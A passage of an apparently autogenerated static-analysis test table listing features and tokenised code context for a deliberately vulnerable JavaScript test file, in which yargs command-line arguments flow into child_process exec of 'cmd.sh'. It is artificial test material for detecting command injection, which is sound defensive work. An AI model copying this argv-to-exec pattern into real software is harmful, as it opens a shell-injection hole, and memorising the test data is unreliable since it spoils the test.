autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | {taint1 ... ted2\\n\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | {taint1 ... ted2\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | {taint1 ... ted2\\n\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:14 | taint1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:14 | taint1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:14 | taint1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:14 | taint1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:14 | taint1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:9:60:31 | taint1: ... t1rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:17:60:31 | {...taint1rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:17:60:31 | {...taint1rest} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:17:60:31 | {...taint1rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:17:60:31 | {...taint1rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:17:60:31 | {...taint1rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | ...taint1rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | ...taint1rest | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | ...taint1rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | ...taint1rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | ...taint1rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | taint1rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | taint1rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | taint1rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | taint1rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:21:60:30 | taint1rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:38 | taint2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:38 | taint2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:38 | taint2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:38 | taint2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:38 | taint2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:33:60:55 | taint2: ... t2rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:41:60:55 | {...taint2rest} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:41:60:55 | {...taint2rest} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:41:60:55 | {...taint2rest} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:41:60:55 | {...taint2rest} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:41:60:55 | {...taint2rest} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | ...taint2rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | ...taint2rest | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | ...taint2rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | ...taint2rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | ...taint2rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | taint2rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | taint2rest | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | taint2rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | taint2rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:45:60:54 | taint2rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:60:63:2 | {\\n\\t\\ttai ... ted2\\n\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:60:63:2 | {\\n\\t\\ttai ... ted2\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:60:63:2 | {\\n\\t\\ttai ... ted2\\n\\t} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:60:63:2 | {\\n\\t\\ttai ... ted2\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:60:63:2 | {\\n\\t\\ttai ... ted2\\n\\t} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:8 | taint1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:8 | taint1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:8 | taint1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:8 | taint1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:8 | taint1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:3:61:18 | taint1: tainted1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | assignedToPropName | taint1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:61:11:61:18 | tainted1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:8 | taint2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:8 | taint2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:8 | taint2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:8 | taint2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:8 | taint2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:3:62:18 | taint2: tainted2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | assignedToPropName | taint2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:62:11:62:18 | tainted2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:3 | cp | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:8 | cp.exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) | 